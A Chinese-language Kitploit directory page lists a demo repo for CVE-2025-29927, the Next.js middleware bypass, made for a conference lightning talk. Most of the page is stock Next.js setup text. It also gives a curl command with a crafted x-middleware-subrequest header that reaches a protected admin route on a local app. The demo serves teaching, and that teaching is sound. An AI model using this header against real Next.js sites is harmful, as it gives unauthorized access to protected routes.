Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
next-attack — 一个用于 NebraskaJS 闪电演讲的 CVE-2025-29927 漏洞演示 | Kitploit
工具/GitHubGitHub/nicknisi/next-attack
漏洞分析IDS/IPS规避Web应用程序漏洞利用错误配置学习与教育
GitHubnicknisi/next-attack

next-attack

一个用于 NebraskaJS 闪电演讲的 CVE-2025-29927 漏洞演示

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

这是一个使用 create-next-app 引导创建的 Next.js 项目。

测试漏洞

首先,你可以确认中间件正常工作并会重定向用户:

root@kitploit:~
curl http://localhost:3000/api/admin

然后,你可以通过以下命令展示中间件是如何被绕过的:

root@kitploit:~
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin

开始使用

首先,运行开发服务器:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

在浏览器中打开 http://localhost:3000 查看结果。

你可以通过修改 app/page.tsx 开始编辑页面。当你编辑文件时,页面会自动更新。

该项目使用 next/font 自动优化并加载 Geist,这是 Vercel 的一个新字体家族。

了解更多

要了解更多关于 Next.js 的信息,请查看以下资源:

  • Next.js 文档 - 了解 Next.js 的功能和 API。
  • 学习 Next.js - 交互式 Next.js 教程。

你可以查看 Next.js GitHub 仓库 - 欢迎提供反馈和贡献!

在 Vercel 上部署

部署 Next.js 应用最简单的方式是使用来自 Next.js 创建者的 Vercel 平台。

更多详情,请参阅我们的 Next.js 部署文档。

下载工具